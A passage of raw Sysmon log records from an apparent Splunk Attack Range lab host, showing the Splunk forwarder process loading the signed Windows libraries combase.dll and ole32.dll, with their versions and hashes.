Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001607118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552true